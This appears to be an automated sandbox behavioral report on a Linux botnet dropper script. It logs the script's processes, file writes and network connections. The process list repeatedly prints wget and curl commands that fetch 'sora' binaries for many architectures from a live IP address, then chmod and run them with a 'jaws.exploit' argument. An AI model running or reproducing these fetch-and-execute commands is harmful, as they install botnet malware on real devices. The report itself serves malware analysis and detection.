| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh | N/A |
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 01:47
Reported
2024-10-18 01:50
Platform
debian9-mipsel-20240611-en
Max time kernel
42s
Max time network
45s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh | N/A |
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |